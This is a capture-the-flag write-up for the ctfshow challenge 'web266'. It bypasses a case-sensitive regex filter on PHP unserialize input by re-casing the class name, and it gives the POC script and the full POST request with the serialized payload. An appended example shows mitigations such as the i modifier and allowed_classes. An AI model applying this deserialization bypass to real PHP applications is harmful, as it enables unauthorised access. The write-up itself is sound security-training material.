web266

Look at the source

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');

class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}

$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

For this challenge it is enough to get one successful deserialization (after deserialization, __destruct() is called when the script ends).

The source filters the class name ctfshow, but the regex has no i modifier, so my blind guess is a case-variation bypass.

Testing shows that PHP serialization is case-insensitive for key names and also for class names.

So we construct the following POC:

<?php
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
}
$a = new ctfshow();
echo(serialize($a));   // O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

Change the case of ctfshow in the serialized string.

Then send it with POST. Because the parameter is read through the php://input wrapper, no key name is needed; but HackBar refuses to send a POST body without a key name, so we can use HackBar to send a request with a key name to Burp Suite and edit it there. Make sure the Content-Length is correct.

Request:

POST / HTTP/1.1
Host: 3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Origin: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
Connection: close
Referer: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show/
Cookie: _ga=GA1.2.217265325.1679571526
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

Note: do not urlencode the string, because php://input does not urldecode.
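The following is an added example of mine, not code from the writeup or from ctfshow. It shows the two defects in the challenge's filter from the defender's side: the regex is case-sensitive while PHP class names are not, and the check runs only after unserialize() has already built the object. The function names check_weak, check_fixed and unserialize_safe are my own; the sample payloads are constructed from the class shape on the page.

```php
<?php
// Added example (not part of the original writeup). The class mirrors the
// challenge's shape but has no __destruct, so nothing is echoed on shutdown.
class ctfshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}

// The challenge's check: a case-sensitive regex over the raw input. In the
// challenge it is also evaluated only AFTER unserialize() has run, so even a
// match does not stop the object from being created.
function check_weak(string $cs): bool {
    return (bool) preg_match('/ctfshow/', $cs);
}

// Same check with the i modifier: also matches "Ctfshow", "CTFSHOW", ...
// This closes the case bypass but is still a denylist, not a real fix.
function check_fixed(string $cs): bool {
    return (bool) preg_match('/ctfshow/i', $cs);
}

// What a defender actually wants: untrusted input must never instantiate
// application classes. With allowed_classes => false every O:... token is
// restored as __PHP_Incomplete_Class, so no real __destruct/__toString runs.
// (Validation also happens before, not after, the unserialize call.)
function unserialize_safe(string $cs) {
    if (!is_string($cs) || $cs === '') {
        return false;
    }
    return unserialize($cs, ['allowed_classes' => false]);
}

// Constructed sample payloads: the serialized class as produced by PHP, and
// the same string with the class name re-cased as in the writeup.
$lower = serialize(new ctfshow());                      // O:7:"ctfshow":2:{...}
$mixed = str_replace('"ctfshow"', '"Ctfshow"', $lower); // O:7:"Ctfshow":2:{...}

foreach ([$lower, $mixed] as $cs) {
    echo "payload: $cs\n";
    echo "  weak check blocks:  " . var_export(check_weak($cs), true) . "\n";
    echo "  fixed check blocks: " . var_export(check_fixed($cs), true) . "\n";

    // Class names are case-insensitive in PHP, so both strings restore a real
    // ctfshow object under plain unserialize(); get_class reports "ctfshow".
    $obj = unserialize($cs);
    echo "  unserialize() gives:      " . get_class($obj) . "\n";

    // With allowed_classes disabled the object is never instantiated.
    $safe = unserialize_safe($cs);
    echo "  unserialize_safe() gives: " . get_class($safe) . "\n";
}
```

Run with `php example.php`: the lower-case payload is blocked by both checks, the re-cased one only by check_fixed, and in both cases plain unserialize() still yields a ctfshow instance, whereas unserialize_safe() yields __PHP_Incomplete_Class. If the application does need objects back from serialized input, allowed_classes takes a whitelist array of class names instead of false; a format such as JSON that cannot name classes at all removes the problem entirely.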